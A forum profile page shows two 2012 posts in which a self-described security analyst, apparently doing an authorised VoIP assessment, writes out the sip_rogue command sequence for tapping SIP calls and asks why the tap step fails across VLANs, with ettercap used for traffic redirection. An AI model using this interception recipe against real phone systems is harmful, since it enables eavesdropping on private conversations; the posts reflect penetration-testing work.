Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - aliz

Pages: [1]
1
Hacking and Security / Re: voip Application-Level Interception need some adivce/help
« on: January 14, 2012, 10:41:09 am »
Thank you for your quick reply. Yes my network does have inter-vlan routing. The voip server which is located in 150.150 vlan can easily be ping' from my vlan which is 130.*. Actually this 150 is entirely dedicated to voip stuff. I think this attack works on some level like if i enter the command status i get by object as ---*--- state means the connection/object i used.

What is not working I think is the tap command which allows me to listen  on the conversation. Here i cannot understand like my iphone e.g is on ip 130.10 in its network settings it knows the proxy server as 150.150 not expecting any traffic from bt4 machine running sip_rogue tool (ip *.*145.20).

When i fire wireshark i can sniff traffic between two sipendpoints.

Please help me forward.

2
Hacking and Security / voip Application-Level Interception need some adivce/help
« on: January 13, 2012, 07:07:24 pm »

I need help I work as sec analyst for a notable company in my country. I'm currently in the activity of assessing VOIP setup. I'm using Application-Level Interception Techniques to test the setup weakness. The tool i'm using to conduct interception level attack is sip_rogue. Sip_rogue is included in bt4. The attack allows you as attacker to listen the conversation occurring between sip phones. The commands are :-

sip_rogue
telnet localhost 6060
Connection 0
create sipudpport port
create sipdispatcher disp
create sipregistrarconnector reg to 10.1.101.2:5060 with the domain
10.1.101.2
create rtphandler rtp
create sipendpoint hacker
issue hacker accept calls
issue hacker relay calls to sip:3500@10.1.100.35
issue hacker tap calls to sip:4000@10.1.100.40 (the attacker)

In the original attack mentioned in hacking exposed VOIP: voice over IP security secret and solution. The victim and the attacker in on the same vlan as proxy server but in my case its different VLAN. As i pick the fone (ext 4000) to listen on the conversation i just get the dial tone. I'm using ettercap to direct the traffic from the victim ip phone to bt4 machine running sip_rogue application.

I hope i can be helped with. Thanks


Pages: [1]